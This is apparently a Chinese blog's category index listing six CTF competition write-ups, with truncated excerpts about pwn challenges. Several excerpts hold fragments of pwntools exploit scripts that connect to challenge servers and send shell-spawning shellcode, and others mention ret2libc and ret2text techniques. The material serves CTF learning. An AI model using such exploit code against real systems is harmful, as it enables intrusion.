category

比赛

该分类下共 6 篇文章。

MoeCTF_2025

PWN前面的几道题是基础的题目,就不再赘述了 boom/boom_revengefrom pwn import*io=remote('61.139.2.1',56079)#io=process('./boom')recv_data=os.popen('./random').read()list=recv_da...

XYCTF2024

hello_world(签到) 开启了pie保护,但是可以泄漏地址,而且存在栈溢出,因此可以先泄漏libc,再打ret2libc。 from pwn import*libc=ELF('./hello_worldlibc.so.6')elf=ELF('./hello_world')io=remote('challenge.imxb...

GeekChallenge2024

ez_shellcode简单的shellcode from pwn import*context.arch='amd64'io=remote('nc1.ctfplus.cn',39373)shellcode_addr=0x0401256shellcode=asm(shellcraft.sh())io.send(shellcode)payl...

XYNU2024信安杯

全是简单题目,直接上exp NC直接nc连接,然后ls+cat flag即可。 shellcodefrom pwn import*context.arch='amd64'io=remote('gz.imxbt.cn',20029)shellcode=asm(shellcraft.sh())io.sendline(shellcode)io....

0xGame2024-复现

where_is_my_binsh 一道简单的题目,存在栈溢出以及system函数,没有/bin/sh\x00字符串,给了变量something的地址,那么就先输入/bin/sh\x00字符串再打ret2text。 from pwn import*io=remote('gz.imxbt.cn',20884)elf=EL...

2025SQCTF

很荣幸参加了第四届SQCTF,作为新生赛,难度还可以,因为本人能力还不够,并没能够akpwn,还得再努力努力(毕竟是想打XCTF的,这点实力是肯定不行的。 浅红欺醉粉,肯信有江梅一道简单到不能再简单的nc签到题。 领取你的小猫娘这是一道64位的题,基本没开什么保护。 这里可以看到有一个后门函数,其判断条件为v5的值为真,因为我们能输入的是v4,而且观察栈上结构可以知道地址相差0...

haoo@blog:~
Startrace interactive shell v1.0
输入 help 查看命令,按 Ctrl K 随时打开。

help · ls · cd · open · search · clear